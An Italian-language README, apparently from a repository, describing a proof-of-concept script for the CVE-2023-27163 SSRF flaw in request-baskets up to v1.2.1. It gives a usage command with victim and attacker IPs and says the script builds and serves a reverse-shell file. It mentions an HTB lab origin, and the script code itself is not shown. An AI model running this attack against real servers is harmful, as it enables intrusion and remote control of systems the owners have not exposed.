
Exploit proof-of-concept per CVE-2023-27163, una vulnerabilità Server-Side Request Forgery (SSRF) in request-baskets fino alla v1.2.1. Include generazione automatica di reverse shell ed esposizione di file.
PoC CVE-2023-27163, SSRF, request-baskets fino alla v1.2.1
Esempio di utilizzo
my_script.sh -i 10.10.11.111 -f 'localhost:80' -t 10.10.14.27
-i indirizzo IP del server vittima
-f indirizzo IP o dominio verso cui dirigere le connessioni prodotte dallo SSRF
-t in questa opzione va il tuo IP locale o l'IP attaccante, per la generazione del file rev.sh, esporre il file.
-p se si desidera impostare una porta specifica.
Questo script è stato sviluppato basandosi su un laboratorio pratico di HTB.